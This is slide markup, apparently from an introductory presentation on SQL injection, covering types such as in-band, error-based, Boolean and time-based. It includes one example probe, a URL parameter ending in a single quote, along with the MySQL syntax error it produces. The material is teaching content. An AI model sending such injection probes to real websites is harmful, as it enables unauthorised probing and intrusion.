                <a:lnTo>
                  <a:pt x="3104837" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="158079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158079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8595896" y="9049222"/>
            <a:ext cx="190944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20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boolean</a:t>
            </a:r>
            <a:endParaRPr sz="44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651163" y="8958669"/>
            <a:ext cx="3113405" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3113405" h="948690">
                <a:moveTo>
                  <a:pt x="0" y="158079"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="158079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158079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2625554" y="9049222"/>
            <a:ext cx="116459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60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e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675006" y="7967631"/>
            <a:ext cx="11245850" cy="992505"/>
            <a:chOff x="1675006" y="7967631"/>
            <a:chExt cx="11245850" cy="992505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="object 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1706408" y="8010206"/>
              <a:ext cx="1868805" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1868804" h="0">
                  <a:moveTo>
                    <a:pt x="1868551" y="0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706419" y="8010206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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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427300" y="8011200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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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550316" y="7999044"/>
              <a:ext cx="885190" cy="948690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="885190" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456"/>
                  </a:lnTo>
                </a:path>
                <a:path w="885190" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="884608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434928" y="7999044"/>
              <a:ext cx="2454910" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2454909" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2454401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2889346" y="7999044"/>
              <a:ext cx="0" cy="960119"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="960120">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="959628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534435" y="8014263"/>
              <a:ext cx="1892935" cy="20320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1892935" h="20320">
                  <a:moveTo>
                    <a:pt x="1892864" y="20266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752919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20"/>
              <a:t>Error-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-665"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-335"/>
              <a:t>SQLi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44752" y="2931714"/>
            <a:ext cx="17136745" cy="340931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89255" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="90300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="650"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-225">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Error-based </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in-band </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>technique </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>forces </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>generate </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>error, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>giving </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>information </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>upon </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>refine </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>their</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>injection.</a:t>
            </a:r>
            <a:endParaRPr sz="460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spcBef>
                <a:spcPts val="475"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
            <a:endParaRPr sz="46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395"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Input:</a:t>
            </a:r>
            <a:endParaRPr sz="3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1576" y="6541999"/>
            <a:ext cx="16341090" cy="52070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1590" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="170"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.random.com/app.php?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="105">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>'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8656" y="7340374"/>
            <a:ext cx="1623695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-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Output:</a:t>
            </a:r>
            <a:endParaRPr sz="3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1493" y="8269727"/>
            <a:ext cx="16351250" cy="9645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14604" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120" marR="166370">
              <a:lnSpc>
                <a:spcPct val="101299"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="114"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1258570" algn="l"/>
                <a:tab pos="1661795" algn="l"/>
                <a:tab pos="2266315" algn="l"/>
                <a:tab pos="2871470" algn="l"/>
                <a:tab pos="3073400" algn="l"/>
                <a:tab pos="4081145" algn="l"/>
                <a:tab pos="4685665" algn="l"/>
                <a:tab pos="5694045" algn="l"/>
                <a:tab pos="6498590" algn="l"/>
                <a:tab pos="7910195" algn="l"/>
                <a:tab pos="9119870" algn="l"/>
                <a:tab pos="9926320" algn="l"/>
                <a:tab pos="11337290" algn="l"/>
                <a:tab pos="12345670" algn="l"/>
                <a:tab pos="14765019" algn="l"/>
                <a:tab pos="15370175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="380">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="380">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="475">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="475">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="254">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sytax</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="790">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="790">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="95">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>check</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="95">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>manual</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="395">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="395">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>corresponds</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="395">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="395">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>your  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>MySQL	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>version…</a:t>
            </a:r>
            <a:endParaRPr sz="2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990536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9"/>
              <a:t>Types </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-305"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-275"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-1115"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-409"/>
              <a:t>Injection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800600" y="2959312"/>
            <a:ext cx="3268979" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3268979" h="948689">
                <a:moveTo>
                  <a:pt x="0" y="158078"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30499" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158078" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110580" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160544" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203938" y="30499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238157" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260598" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3268657" y="158078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3268657" y="790381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260598" y="840345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238157" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203938" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160544" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110580" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158078" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30499" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158078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13761" y="3050662"/>
            <a:ext cx="304101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670">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection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04356" y="3858260"/>
            <a:ext cx="9062085" cy="3157855"/>
            <a:chOff x="1404356" y="3858260"/>
            <a:chExt cx="9062085" cy="3157855"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10434928" y="3889693"/>
              <a:ext cx="0" cy="1099185"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="1099185">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1098569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74961" y="5009816"/>
              <a:ext cx="6860540" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6860540" h="0">
                  <a:moveTo>
                    <a:pt x="6859966" y="0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35788" y="6035784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4260823" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260823" y="948452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310788" y="940393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354183" y="917953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388402" y="883733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410843" y="840339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418902" y="790373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418902" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410843" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388402" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354183" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310788" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426082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35788" y="6035784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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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753015" y="6126589"/>
            <a:ext cx="378396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165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In-band</a:t>
            </a:r>
